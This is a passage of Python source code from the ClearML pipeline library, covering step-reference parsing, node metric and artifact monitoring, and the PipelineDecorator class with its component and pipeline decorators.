'Skipping launching step \'{}\': {}'.format(name, self._nodes[name]))
# update current state (in configuration, so that we could later continue an aborted pipeline)
self._force_task_configuration_update()
# visualize pipeline state (plot)
self.update_execution_plot()
# quit if all pipelines nodes are fully executed.
if not next_nodes and not self._running_nodes:
break
# stop all currently running jobs:
for node in list(self._nodes.values()):
if node.executed is False and not node.continue_on_fail:
self._pipeline_task_status_failed = True
if node.job and not node.job.is_stopped():
node.job.abort()
elif not node.job and not node.executed:
# mark Node as skipped if it has no Job object and it is not executed
node.skip_job = True
# visualize pipeline state (plot)
self.update_execution_plot()
if self._stop_event:
# noinspection PyBroadException
try:
self._stop_event.set()
except Exception:
pass
def _parse_step_ref(self, value):
# type: (Any) -> Optional[str]
"""
Return the step reference. For example "${step1.parameters.Args/param}"
:param value: string
:return:
"""
# look for all the step references
pattern = self._step_ref_pattern
updated_value = value
if isinstance(value, str):
for g in pattern.findall(value):
# update with actual value
new_val = self.__parse_step_reference(g)
updated_value = updated_value.replace(g, new_val, 1)
return updated_value
def _parse_task_overrides(self, task_overrides):
# type: (dict) -> dict
"""
Return the step reference. For example "${step1.parameters.Args/param}"
:param task_overrides: string
:return:
"""
updated_overrides = {}
for k, v in task_overrides.items():
updated_overrides[k] = self._parse_step_ref(v)
return updated_overrides
def _verify_node_name(self, name):
# type: (str) -> None
if name in self._nodes:
raise ValueError('Node named \'{}\' already exists in the pipeline dag'.format(name))
if name in self._reserved_pipeline_names:
raise ValueError('Node named \'{}\' is a reserved keyword, use a different name'.format(name))
def _scan_monitored_nodes(self):
# type: () -> None
"""
Scan all nodes and monitor their metrics/artifacts/models
"""
for node in list(self._nodes.values()):
self._monitor_node(node)
def _monitor_node(self, node):
# type: (PipelineController.Node) -> None
"""
If Node is running, put the metrics from the node on the pipeline itself.
:param node: Node to test
"""
if not node:
return
# verify we have the node
if node.name not in self._monitored_nodes:
self._monitored_nodes[node.name] = {}
# if we are done with this node, skip it
if self._monitored_nodes[node.name].get('completed'):
return
if node.job and node.job.task:
task = node.job.task
elif node.job and node.executed and isinstance(node.executed, str):
task = Task.get_task(task_id=node.executed)
else:
return
# update the metrics
if node.monitor_metrics:
metrics_state = self._monitored_nodes[node.name].get('metrics', {})
logger = self._task.get_logger()
scalars = task.get_reported_scalars(x_axis='iter')
for (s_title, s_series), (t_title, t_series) in node.monitor_metrics:
values = scalars.get(s_title, {}).get(s_series)
if values and values.get('x') is not None and values.get('y') is not None:
x = values['x'][-1]
y = values['y'][-1]
last_y = metrics_state.get(s_title, {}).get(s_series)
if last_y is None or y > last_y:
logger.report_scalar(title=t_title, series=t_series, value=y, iteration=int(x))
last_y = y
if not metrics_state.get(s_title):
metrics_state[s_title] = {}
metrics_state[s_title][s_series] = last_y
self._monitored_nodes[node.name]['metrics'] = metrics_state
if node.monitor_artifacts:
task.reload()
artifacts = task.data.execution.artifacts
self._task.reload()
output_artifacts = []
for s_artifact, t_artifact in node.monitor_artifacts:
# find artifact
for a in artifacts:
if a.key != s_artifact:
continue
new_a = copy(a)
new_a.key = t_artifact
output_artifacts.append(new_a)
break
# update artifacts directly on the Task
if output_artifacts:
# noinspection PyProtectedMember
self._task._add_artifacts(output_artifacts)
if node.monitor_models:
task.reload()
output_models = task.data.models.output
self._task.reload()
target_models = []
for s_model, t_model in node.monitor_models:
# find artifact
for a in output_models:
if a.name != s_model:
continue
new_a = copy(a)
new_a.name = t_model
target_models.append(new_a)
break
# update artifacts directly on the Task
if target_models:
self._task.reload()
models = self._task.data.models
keys = [a.name for a in models.output]
models.output = [a for a in models.output or [] if a.name not in keys] + target_models
# noinspection PyProtectedMember
self._task._edit(models=models)
# update the state (so that we do not scan the node twice)
if node.job.is_stopped():
self._monitored_nodes[node.name]['completed'] = True
@classmethod
def _get_pipeline_task(cls):
# type: () -> Task
"""
Return the pipeline Task (either the current one, or the parent Task of the currently running Task)
Raise ValueError if we could not locate the pipeline Task
:return: Pipeline Task
"""
# get main Task.
task = Task.current_task()
if str(task.task_type) == str(Task.TaskTypes.controller) and cls._tag in task.get_system_tags():
return task
# get the parent Task, it should be the pipeline
if not task.parent:
raise ValueError("Could not locate parent Pipeline Task")
parent = Task.get_task(task_id=task.parent)
if str(parent.task_type) == str(Task.TaskTypes.controller) and cls._tag in parent.get_system_tags():
return parent
raise ValueError("Could not locate parent Pipeline Task")
def __verify_step_reference(self, node, step_ref_string):
# type: (PipelineController.Node, str) -> Optional[str]
"""
Verify the step reference. For example "${step1.parameters.Args/param}"
Raise ValueError on misconfiguration
:param Node node: calling reference node (used for logging)
:param str step_ref_string: For example "${step1.parameters.Args/param}"
:return: If step reference is used, return the pipeline step name, otherwise return None
"""
parts = step_ref_string[2:-1].split('.')
v = step_ref_string
if len(parts) < 2:
raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
prev_step = parts[0]
input_type = parts[1]
# check if we reference the pipeline arguments themselves
if prev_step == self._pipeline_step_ref:
if input_type not in self._pipeline_args:
raise ValueError("Node '{}', parameter '{}', step name '{}' is invalid".format(node.name, v, prev_step))
return None
if prev_step not in self._nodes:
raise ValueError("Node '{}', parameter '{}', step name '{}' is invalid".format(node.name, v, prev_step))
if input_type not in ('artifacts', 'parameters', 'models', 'id'):
raise ValueError(
"Node {}, parameter '{}', input type '{}' is invalid".format(node.name, v, input_type))
if input_type != 'id' and len(parts) < 3:
raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
if input_type == 'models':
try:
model_type = parts[2].lower()
except Exception:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model_type is missing {}".format(
node.name, v, input_type, parts))
if model_type not in ('input', 'output'):
raise ValueError(
"Node '{}', parameter '{}', input type '{}', "
"model_type is invalid (input/output) found {}".format(
node.name, v, input_type, model_type))
if len(parts) < 4:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model index is missing".format(
node.name, v, input_type))
# check casting
try:
int(parts[3])
except Exception:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model index is missing {}".format(
node.name, v, input_type, parts))
if len(parts) < 5:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model property is missing".format(
node.name, v, input_type))
if not hasattr(BaseModel, parts[4]):
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model property is invalid {}".format(
node.name, v, input_type, parts[4]))
return prev_step
def __parse_step_reference(self, step_ref_string):
"""
return the adjusted value for "${step...}"
:param step_ref_string: reference string of the form ${step_name.type.value}"
:return: str with value
"""
parts = step_ref_string[2:-1].split('.')
if len(parts) < 2:
raise ValueError("Could not parse reference '{}'".format(step_ref_string))
prev_step = parts[0]
input_type = parts[1].lower()
# check if we reference the pipeline arguments themselves
if prev_step == self._pipeline_step_ref:
if parts[1] not in self._pipeline_args:
raise ValueError("Could not parse reference '{}', "
"pipeline argument '{}' could not be found".format(step_ref_string, parts[1]))
return self._pipeline_args[parts[1]]
if prev_step not in self._nodes or (
not self._nodes[prev_step].job and
not self._nodes[prev_step].executed and
not self._nodes[prev_step].base_task_id
):
raise ValueError("Could not parse reference '{}', step '{}' could not be found".format(
step_ref_string, prev_step))
if input_type not in (
'artifacts', 'parameters', 'models', 'id',
'script', 'execution', 'container', 'output',
'comment', 'models', 'tags', 'system_tags', 'project'):
raise ValueError("Could not parse reference '{}', type '{}' not valid".format(step_ref_string, input_type))
if input_type != 'id' and len(parts) < 3:
raise ValueError("Could not parse reference '{}', missing fields in '{}'".format(step_ref_string, parts))
task = self._nodes[prev_step].job.task if self._nodes[prev_step].job \
else Task.get_task(task_id=self._nodes[prev_step].executed or self._nodes[prev_step].base_task_id)
task.reload()
if input_type == 'artifacts':
# fix \. to use . in artifacts
artifact_path = ('.'.join(parts[2:])).replace('\\.', '\\_dot_\\')
artifact_path = artifact_path.split('.')
obj = task.artifacts
for p in artifact_path:
p = p.replace('\\_dot_\\', '.')
if isinstance(obj, dict):
obj = obj.get(p)
elif hasattr(obj, p):
obj = getattr(obj, p)
else:
raise ValueError("Could not locate artifact {} on previous step {}".format(
'.'.join(parts[1:]), prev_step))
return str(obj)
elif input_type == 'parameters':
step_params = task.get_parameters()
param_name = '.'.join(parts[2:])
if param_name not in step_params:
raise ValueError("Could not locate parameter {} on previous step {}".format(
'.'.join(parts[1:]), prev_step))
return step_params.get(param_name)
elif input_type == 'models':
model_type = parts[2].lower()
if model_type not in ('input', 'output'):
raise ValueError("Could not locate model {} on previous step {}".format(
'.'.join(parts[1:]), prev_step))
try:
model_idx = int(parts[3])
model = task.models[model_type][model_idx]
except Exception:
raise ValueError("Could not locate model {} on previous step {}, index {} is invalid".format(
'.'.join(parts[1:]), prev_step, parts[3]))
return str(getattr(model, parts[4]))
elif input_type == 'id':
return task.id
elif input_type in (
'script', 'execution', 'container', 'output',
'comment', 'models', 'tags', 'system_tags', 'project'):
# noinspection PyProtectedMember
return task._get_task_property('.'.join(parts[1:]))
return None
@classmethod
def __get_node_status(cls, a_node):
# type: (PipelineController.Node) -> str
if not a_node:
return "pending"
if a_node.skip_job:
return "skipped"
if a_node.job and a_node.job.is_cached_task():
return "cached"
if a_node.job and a_node.job.task:
# no need to refresh status
return str(a_node.job.task.data.status)
if a_node.executed:
return "executed"
return "pending"
@classmethod
def __create_task_link(cls, a_node, task_link_template):
# type: (PipelineController.Node, str) -> str
if not a_node:
return ''
# create the detailed parameter table
task_id = project_id = None
if a_node.job:
project_id = a_node.job.task.project
task_id = a_node.job.task.id
elif a_node.executed:
task_id = a_node.executed
if cls._task_project_lookup.get(task_id):
project_id = cls._task_project_lookup[task_id]
else:
# noinspection PyBroadException
try:
project_id = Task.get_task(task_id=task_id).project
except Exception:
project_id = '*'
cls._task_project_lookup[task_id] = project_id
if not task_id:
return ''
return '<a href="{}"> {} </a>'.format(task_link_template.format(project=project_id, task=task_id), task_id)
class PipelineDecorator(PipelineController):
_added_decorator = [] # type: List[dict]
_singleton = None # type: Optional[PipelineDecorator]
_eager_step_artifact = 'eager_step'
_eager_execution_instance = False
_debug_execute_step_process = False
_debug_execute_step_function = False
_default_execution_queue = None
_multi_pipeline_instances = []
_atexit_registered = False
def __init__(
self,
name, # type: str
project, # type: str
version, # type: str
pool_frequency=0.2, # type: float
add_pipeline_tags=False, # type: bool
target_project=None, # type: Optional[str]
abort_on_failure=False, # type: bool
):
# type: (...) -> ()
"""
Create a new pipeline controller. The newly created object will launch and monitor the new experiments.
:param name: Provide pipeline name (if main Task exists it overrides its name)
:param project: Provide project storing the pipeline (if main Task exists it overrides its project)
:param version: Must provide pipeline version. This version allows to uniquely identify the pipeline
template execution. Examples for semantic versions: version='1.0.1' , version='23', version='1.2'
:param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
:param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
steps (Tasks) created by this pipeline.
:param str target_project: If provided, all pipeline steps are cloned into the target project
:param bool abort_on_failure: If False (default), failed pipeline steps will not cause the pipeline
to stop immediately, instead any step that is not connected (or indirectly connected) to the failed step,
will still be executed. Nonetheless the pipeline itself will be marked failed, unless the failed step
was specifically defined with "continue_on_fail=True".
If True, any failed step will cause the pipeline to immediately abort, stop all running steps,
and mark the pipeline as failed.
"""
super(PipelineDecorator, self).__init__(
name=name,
project=project,
version=version,
pool_frequency=pool_frequency,
add_pipeline_tags=add_pipeline_tags,
target_project=target_project,
abort_on_failure=abort_on_failure,
)
# if we are in eager execution, make sure parent class knows it
if self._eager_execution_instance:
self._mock_execution = True
if PipelineDecorator._default_execution_queue:
super(PipelineDecorator, self).set_default_execution_queue(
PipelineDecorator._default_execution_queue)
for n in self._added_decorator:
self.add_function_step(**n)
self._added_decorator.clear()
PipelineDecorator._singleton = self
self._reference_callback = []
# map eager steps task id to the new step name
self._eager_steps_task_id = {} # type: Dict[str, str]
def _daemon(self):
# type: () -> ()
"""
The main pipeline execution loop. This loop is executed on its own dedicated thread.
override the daemon function, we only need to update the state
:return:
"""
pooling_counter = 0
launched_nodes = set()
last_monitor_report = last_plot_report = time()
while self._stop_event:
# stop request
if self._stop_event.wait(self._pool_frequency if pooling_counter else 0.01):
break
pooling_counter += 1
# check the pipeline time limit
if self._pipeline_time_limit and (time() - self._start_time) > self._pipeline_time_limit:
break
# check the state of all current jobs
# if no a job ended, continue
completed_jobs = []
nodes_failed_stop_pipeline = []
force_execution_plot_update = False
for j in self._running_nodes:
node = self._nodes[j]
if not node.job:
continue
if node.job.is_stopped():
completed_jobs.append(j)
node_failed = node.job.is_failed()
node.executed = node.job.task_id() if not node_failed else False
if j in launched_nodes:
launched_nodes.remove(j)
# check if we need to stop all running steps
if node_failed and self._abort_running_steps_on_failure and not node.continue_on_fail:
nodes_failed_stop_pipeline.append(node.name)
elif node.timeout:
started = node.job.task.data.started
if (datetime.now().astimezone(started.tzinfo) - started).total_seconds() > node.timeout:
node.job.abort()
completed_jobs.append(j)
node.executed = node.job.task_id()
elif j in launched_nodes and node.job.is_running():
# make sure update the execution graph when the job started running
# (otherwise it will still be marked queued)
launched_nodes.remove(j)
force_execution_plot_update = True
# update running jobs
self._running_nodes = [j for j in self._running_nodes if j not in completed_jobs]
# nothing changed, we can sleep
if not completed_jobs and self._running_nodes:
# force updating the pipeline state (plot) at least every 5 min.
if force_execution_plot_update or time()-last_plot_report > self._update_execution_plot_interval:
last_plot_report = time()
last_monitor_report = time()
self.update_execution_plot()
elif time()-last_monitor_report > self._monitor_node_interval:
last_monitor_report = time()
self._scan_monitored_nodes()
continue
# callback on completed jobs
if self._experiment_completed_cb or self._post_step_callbacks:
for job in completed_jobs:
job_node = self._nodes.get(job)
if not job_node:
continue
if self._experiment_completed_cb:
self._experiment_completed_cb(self, job_node)
if self._post_step_callbacks.get(job_node.name):
self._post_step_callbacks[job_node.name](self, job_node)
# check if we need to stop the pipeline, and abort all running steps
if nodes_failed_stop_pipeline:
print('Aborting pipeline and stopping all running steps, node {} failed'.format(
nodes_failed_stop_pipeline))
break
# update current state (in configuration, so that we could later continue an aborted pipeline)
self._force_task_configuration_update()
# visualize pipeline state (plot)
self.update_execution_plot()
# stop all currently running jobs, protect against changes while iterating):
for node in list(self._nodes.values()):
if node.executed is False and not node.continue_on_fail:
self._pipeline_task_status_failed = True
if node.job and not node.job.is_stopped():
node.job.abort()
elif not node.job and not node.executed:
# mark Node as skipped if it has no Job object and it is not executed
node.skip_job = True
# if this is a standalone node, we need to remove it from the graph
if not node.parents:
# check if this node is anyone's parent
found_parent = False
for v in list(self._nodes.values()):
if node.name in (v.parents or []):
found_parent = True
break
if not found_parent:
self._nodes.pop(node.name, None)
# visualize pipeline state (plot)
self.update_execution_plot()
if self._stop_event:
# noinspection PyBroadException
try:
self._stop_event.set()
except Exception:
pass
def update_execution_plot(self):
# type: () -> ()
"""
Update sankey diagram of the current pipeline
"""
self._update_eager_generated_steps()
super(PipelineDecorator, self).update_execution_plot()
def _update_eager_generated_steps(self):
# noinspection PyProtectedMember
self._task.reload()
artifacts = self._task.data.execution.artifacts
# check if we have a new step on the DAG
eager_artifacts = []
for a in artifacts:
if a.key and a.key.startswith('{}:'.format(self._eager_step_artifact)):
# expected value: '"eager_step":"parent-node-task-id":"eager-step-task-id'
eager_artifacts.append(a)
# verify we have the step, if we do not, add it.
delete_artifact_keys = []
for artifact in eager_artifacts:
_, parent_step_task_id, eager_step_task_id = artifact.key.split(':', 2)
# deserialize node definition
eager_node_def = json.loads(artifact.type_data.preview)
eager_node_name, eager_node_def = list(eager_node_def.items())[0]
# verify we do not have any new nodes on the DAG (i.e. a step generating a Node eagerly)
parent_node = None
for node in list(self._nodes.values()):
if not node.job and not node.executed:
continue
t_id = node.executed or node.job.task_id
if t_id == parent_step_task_id:
parent_node = node
break
if not parent_node:
# should not happen
continue
new_step_node_name = '{}_{}'.format(parent_node.name, eager_node_name)
counter = 1
while new_step_node_name in self._nodes:
new_step_node_name = '{}_{}'.format(new_step_node_name, counter)
counter += 1
eager_node_def['name'] = new_step_node_name
eager_node_def['parents'] = [parent_node.name]
is_cached = eager_node_def.pop('is_cached', None)
self._nodes[new_step_node_name] = self.Node(**eager_node_def)
self._nodes[new_step_node_name].job = RunningJob(existing_task=eager_step_task_id)
if is_cached:
self._nodes[new_step_node_name].job.force_set_is_cached(is_cached)
# make sure we will not rescan it.
delete_artifact_keys.append(artifact.key)
# remove all processed eager step artifacts
if delete_artifact_keys:
# noinspection PyProtectedMember
self._task._delete_artifacts(delete_artifact_keys)
self._force_task_configuration_update()
def _create_task_from_function(
self, docker, docker_args, docker_bash_setup_script,
function, function_input_artifacts, function_kwargs, function_return,
packages, project_name, task_name, task_type, repo, branch, commit,
helper_functions,
):
def sanitize(function_source):
matched = re.match(r"[\s]*@PipelineDecorator.component[\s\\]*\(", function_source)
if matched:
function_source = function_source[matched.span()[1]:]
# find the last ")"
open_parenthesis = 0
last_index = -1
for i, c in enumerate(function_source):
if not open_parenthesis and c == ')':
last_index = i
break
elif c == ')':
open_parenthesis -= 1
elif c == '(':
open_parenthesis += 1
if last_index >= 0:
function_source = function_source[last_index+1:].lstrip()
return function_source
task_definition = CreateFromFunction.create_task_from_function(
a_function=function,
function_kwargs=function_kwargs or None,
function_input_artifacts=function_input_artifacts,
function_return=function_return,
project_name=project_name,
task_name=task_name,
task_type=task_type,
repo=repo,
branch=branch,
commit=commit,
packages=packages,
docker=docker,
docker_args=docker_args,
docker_bash_setup_script=docker_bash_setup_script,
output_uri=None,
helper_functions=helper_functions,
dry_run=True,
_sanitize_function=sanitize,
)
return task_definition
def _find_executed_node_leaves(self):
# type: () -> List[PipelineController.Node]
all_parents = set([p for n in list(self._nodes.values()) if n.executed for p in n.parents])
executed_leaves = [name for name, n in list(self._nodes.items()) if n.executed and name not in all_parents]
return executed_leaves
def _adjust_task_hashing(self, task_hash):
# type: (dict) -> dict
"""
Fix the Task hashing so that parameters pointing to the current Task artifact are encoded using the
hash content of the artifact, instead of the Task.id
:param task_hash: Task representation dict
:return: Adjusted Task representation dict
"""
if task_hash.get('hyper_params'):
updated_params = {}
for k, v in task_hash['hyper_params'].items():
if k.startswith("{}/".format(CreateFromFunction.input_artifact_section)) and \
str(v).startswith("{}.".format(self._task.id)):
task_id, artifact_name = str(v).split(".", 1)
if artifact_name in self._task.artifacts:
updated_params[k] = self._task.artifacts[artifact_name].hash
task_hash['hyper_params'].update(updated_params)
return task_hash
@classmethod
def component(
cls,
_func=None, *,
return_values=('return_object', ), # type: Union[str, List[str]]
name=None, # type: Optional[str]
cache=False, # type: bool
packages=None, # type: Optional[Union[str, Sequence[str]]]
parents=None, # type: Optional[List[str]]
execution_queue=None, # type: Optional[str]
continue_on_fail=False, # type: bool
docker=None, # type: Optional[str]
docker_args=None, # type: Optional[str]
docker_bash_setup_script=None, # type: Optional[str]
task_type=None, # type: Optional[str]
repo=None, # type: Optional[str]
repo_branch=None, # type: Optional[str]
repo_commit=None, # type: Optional[str]
helper_functions=None, # type: Optional[Sequence[Callable]]
monitor_metrics=None, # type: Optional[List[Union[Tuple[str, str], Tuple[(str, str), (str, str)]]]]
monitor_artifacts=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
monitor_models=None # type: Optional[List[Union[str, Tuple[str, str]]]]
):
# type: (...) -> Callable
"""
pipeline component function to be executed remotely
:param _func: wrapper function
:param return_values: Provide a list of names for all the results.
Notice! If not provided no results will be stored as artifacts.
:param name: Optional, set the name of the pipeline component task.
If not provided, the wrapped function name is used as the pipeline component name
:param cache: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task. Default: False
:param packages: Manually specify a list of required packages or a local requirements.txt file.
Example: ["tqdm>=2.1", "scikit-learn"] or "./requirements.txt"
If not provided, packages are automatically added based on the imports used inside the wrapped function.
:param parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the pipeline's default execution queue
:param continue_on_fail: (default False). If True, a failed step will not cause the pipeline to stop
(or marked as failed). Notice, that steps that are connected (or indirectly connected)
to the failed step will be skipped.
:param docker: Specify the docker image to be used when executing the pipeline step remotely
:param docker_args: Add docker execution arguments for the remote execution
(use single string for all docker arguments).
:param docker_bash_setup_script: Add a bash script to be executed inside the docker before
setting up the Task's environment
:param task_type: Optional, The task type to be created. Supported values: 'training', 'testing', 'inference',
'data_processing', 'application', 'monitor', 'controller', 'optimizer', 'service', 'qc', 'custom'
:param repo: Optional, specify a repository to attach to the function, when remotely executing.
Allow users to execute the function inside the specified repository, enabling them to load modules/script
from the repository. Notice the execution work directory will be the repository root folder.
Supports both git repo url link, and local repository path (automatically converted into the remote
git/commit as is currently checkout).
Example remote url: 'https://github.com/user/repo.git'
Example local repo copy: './repo' -> will automatically store the remote
repo url and commit ID based on the locally cloned copy
:param repo_branch: Optional, specify the remote repository branch (Ignored, if local repo path is used)
:param repo_commit: Optional, specify the repository commit id (Ignored, if local repo path is used)
:param helper_functions: Optional, a list of helper functions to make available
for the standalone pipeline step function Task. By default the pipeline step function has
no access to any of the other functions, by specifying additional functions here, the remote pipeline step
could call the additional functions.
Example, assuming we have two functions parse_data(), and load_data(): [parse_data, load_data]
:param monitor_metrics: Optional, Automatically log the step's reported metrics also on the pipeline Task.
The expected format is a list of pairs metric (title, series) to log:
[(step_metric_title, step_metric_series), ]
Example: [('test', 'accuracy'), ]
Or a list of tuple pairs, to specify a different target metric to use on the pipeline Task:
[((step_metric_title, step_metric_series), (target_metric_title, target_metric_series)), ]
Example: [[('test', 'accuracy'), ('model', 'accuracy')], ]
:param monitor_artifacts: Optional, Automatically log the step's artifacts on the pipeline Task.
Provided a list of artifact names created by the step function, these artifacts will be logged
automatically also on the Pipeline Task itself.
Example: ['processed_data', ]
(target artifact name on the Pipeline Task will hav ethe same name as the original artifact)
Alternatively, provide a list of pairs (source_artifact_name, target_artifact_name):
where the first string is the artifact name as it appears on the component Task,
and the second is the target artifact name to put on the Pipeline Task
Example: [('processed_data', 'final_processed_data'), ]
:param monitor_models: Optional, Automatically log the step's output models on the pipeline Task.
Provided a list of model names created by the step's Task, they will also appear on the Pipeline itself.
Example: ['model_weights', ]
To select the latest (lexicographic) model use "model_*", or the last created model with just "*"
Example: ['model_weights_*', ]
Alternatively, provide a list of pairs (source_model_name, target_model_name):
where the first string is the model name as it appears on the component Task,
and the second is the target model name to put on the Pipeline Task
Example: [('model_weights', 'final_model_weights'), ]
:return: function wrapper
"""
def decorator_wrap(func):
_name = name or str(func.__name__)
function_return = return_values if isinstance(return_values, (tuple, list)) else [return_values]
inspect_func = inspect.getfullargspec(func)
# add default argument values
if inspect_func.args:
default_values = list(inspect_func.defaults or [])
default_values = ([None] * (len(inspect_func.args)-len(default_values))) + default_values
function_kwargs = {k: v for k, v in zip(inspect_func.args, default_values)}
else:
function_kwargs = dict()
add_step_spec = dict(
name=_name,
function=func,
function_kwargs=function_kwargs,
function_return=function_return,
cache_executed_step=cache,
packages=packages,
parents=parents,
execution_queue=execution_queue,
continue_on_fail=continue_on_fail,
docker=docker,
docker_args=docker_args,
docker_bash_setup_script=docker_bash_setup_script,
task_type=task_type,
repo=repo,
repo_branch=repo_branch,
repo_commit=repo_commit,
helper_functions=helper_functions,
monitor_metrics=monitor_metrics,
monitor_models=monitor_models,
monitor_artifacts=monitor_artifacts,
)
if cls._singleton:
cls._singleton.add_function_step(**add_step_spec)
else:
cls._added_decorator.append(add_step_spec)
@functools.wraps(func)
def wrapper(*args, **kwargs):
if cls._debug_execute_step_function:
args = [v._remoteref() if isinstance(v, LazyEvalWrapper) else v for v in args]
kwargs = {k: v._remoteref() if isinstance(v, LazyEvalWrapper) else v for k, v in kwargs.items()}
func_return = []
def result_wrapper(a_func_return, return_index):
if not a_func_return:
a_func_return.append(func(*args, **kwargs))
a_func_return = a_func_return[0]
return a_func_return if return_index is None else a_func_return[return_index]
if len(function_return) == 1:
return LazyEvalWrapper(
callback=functools.partial(result_wrapper, func_return, None),
remote_reference=functools.partial(result_wrapper, func_return, None))
else:
return_w = [LazyEvalWrapper(
callback=functools.partial(result_wrapper, func_return, i),
remote_reference=functools.partial(result_wrapper, func_return, i))
for i, _ in enumerate(function_return)]
return return_w
# resolve all lazy objects if we have any:
kwargs_artifacts = {}
for i, v in enumerate(args):
kwargs[inspect_func.args[i]] = v
kwargs_artifacts.update(
{k: v._remoteref() for k, v in kwargs.items() if isinstance(v, LazyEvalWrapper)}
)
kwargs = {k: v for k, v in kwargs.items() if not isinstance(v, LazyEvalWrapper)}
# check if we have the singleton
if not cls._singleton:
# todo: somehow make sure the generated tasks list the parent pipeline as parent
original_tags = Task.current_task().get_tags(), Task.current_task().get_system_tags()
# This is an adhoc pipeline step,
PipelineDecorator._eager_execution_instance = True
a_pipeline = PipelineDecorator(
name=name,
project='DevOps', # it will not actually be used
version='0.0.0',
pool_frequency=111,
add_pipeline_tags=False,
target_project=None,
)
target_queue = \
PipelineDecorator._default_execution_queue or \
Task.current_task().data.execution.queue
if target_queue:
PipelineDecorator.set_default_execution_queue(target_queue)
else:
# if we are are not running from a queue, we are probably in debug mode
a_pipeline._clearml_job_class = LocalClearmlJob
a_pipeline._default_execution_queue = 'mock'
# restore tags, the pipeline might add a few
Task.current_task().set_tags(original_tags[0])
Task.current_task().set_system_tags(original_tags[1])
# get original node name
_node_name = _name
# get node
_node = cls._singleton._nodes[_node_name]
# if we already have a JOB on the node, this means we are calling the same function/task
# twice inside the pipeline, this means we need to replicate the node.
if _node.job:
_node = _node.copy()
# find a new name
counter = 1
while _node.name in cls._singleton._nodes:
_node.name = '{}_{}'.format(_node_name, counter)
counter += 1
_node_name = _node.name
cls._singleton._nodes[_node.name] = _node
# update artifacts kwargs
for k, v in kwargs_artifacts.items():
if k in kwargs:
kwargs.pop(k, None)
_node.parameters["{}/{}".format(CreateFromFunction.input_artifact_section, k)] = v
if v and '.' in str(v):
parent_id, _ = str(v).split('.', 1)
# find parent and push it into the _node.parents
for n, node in cls._singleton._nodes.items():
if n != _node.name and node.executed and node.executed == parent_id:
if n not in _node.parents:
_node.parents.append(n)
break
for k, v in kwargs.items():
if v is None or isinstance(v, (bool, int, float, str)):
_node.parameters["{}/{}".format(CreateFromFunction.kwargs_section, k)] = v
elif isinstance(v, (list, tuple)) and all(isinstance(i, (bool, int, float, str)) for i in v):
_node.parameters["{}/{}".format(CreateFromFunction.kwargs_section, k)] = v
else:
# we need to create an artifact
artifact_name = 'result_{}_{}'.format(re.sub(r'\W+', '', _node.name), k)
cls._singleton._task.upload_artifact(
name=artifact_name, artifact_object=v, wait_on_upload=True)
_node.parameters["{}/{}".format(CreateFromFunction.input_artifact_section, k)] = \
"{}.{}".format(cls._singleton._task.id, artifact_name)
# now add all the executed nodes as parents (only the leaves of the DAG, no need for parents)
_node.parents = list(
set((_node.parents or []) + cls._singleton._find_executed_node_leaves())
- set(list(_node.name)))
# verify the new step
cls._singleton._verify_node(_node)
# launch the new step
cls._singleton._launch_node(_node)
# check if we generated the pipeline we need to update the new eager step
if PipelineDecorator._eager_execution_instance and _node.job:
# check if we need to add the pipeline tag on the new node
pipeline_tags = [t for t in Task.current_task().get_tags() or []
if str(t).startswith(cls._node_tag_prefix)]
if pipeline_tags and _node.job and _node.job.task:
pipeline_tags = list(set((_node.job.task.get_tags() or []) + pipeline_tags))
_node.job.task.set_tags(pipeline_tags)
# force parent task as pipeline
_node.job.task._edit(parent=Task.current_task().parent)
# store the new generated node, so we can later serialize it
pipeline_dag = cls._singleton._serialize()
# check if node is cached
if _node.job.is_cached_task():
pipeline_dag[_node_name]['is_cached'] = True
# store entire definition on the parent pipeline
from clearml.backend_api.services import tasks
artifact = tasks.Artifact(
key='{}:{}:{}'.format(cls._eager_step_artifact, Task.current_task().id, _node.job.task_id()),
type="json",
mode='output',
type_data=tasks.ArtifactTypeData(
preview=json.dumps({_node_name: pipeline_dag[_node_name]}),
content_type='application/pipeline')
)
req = tasks.AddOrUpdateArtifactsRequest(
task=Task.current_task().parent, artifacts=[artifact], force=True)
res = Task.current_task().send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
pass
def results_reference(return_name):
# wait until job is completed
_node.job.wait(pool_period=0.2)
if _node.job.is_failed() and not _node.continue_on_fail:
raise ValueError(
'Pipeline step "{}", Task ID={} failed'.format(_node.name, _node.job.task_id()))
_node.executed = _node.job.task_id()
return "{}.{}".format(_node.job.task_id(), return_name)
def result_wrapper(return_name):
# wait until job is completed
_node.job.wait(pool_period=0.2)
if _node.job.is_failed():
raise ValueError(
'Pipeline step "{}", Task ID={} failed'.format(_node.name, _node.job.task_id()))
_node.executed = _node.job.task_id()
return Task.get_task(_node.job.task_id()).artifacts[return_name].get()
return_w = [LazyEvalWrapper(
callback=functools.partial(result_wrapper, n),
remote_reference=functools.partial(results_reference, n)) for n in function_return]
return return_w[0] if len(return_w) == 1 else return_w
return wrapper
return decorator_wrap if _func is None else decorator_wrap(_func)
@classmethod
def pipeline(
cls,
_func=None, *, # noqa
name, # type: str
project, # type: str
version, # type: str
return_value=None, # type: Optional[str]
default_queue=None, # type: Optional[str]
pool_frequency=0.2, # type: float
add_pipeline_tags=False, # type: bool
target_project=None, # type: Optional[str]
abort_on_failure=False, # type: bool
pipeline_execution_queue='services', # type: Optional[str]
multi_instance_support=False
):
# type: (...) -> Callable
"""
Decorate pipeline logic function.
:param name: Provide pipeline name (if main Task exists it overrides its name)
:param project: Provide project storing the pipeline (if main Task exists it overrides its project)
:param version: Must provide pipeline version. This version allows to uniquely identify the pipeline
template execution. Examples for semantic versions: version='1.0.1' , version='23', version='1.2'
:param return_value: Optional, Provide an artifact name to store the pipeline function return object
Notice, If not provided the pipeline will not store the pipeline function return value.
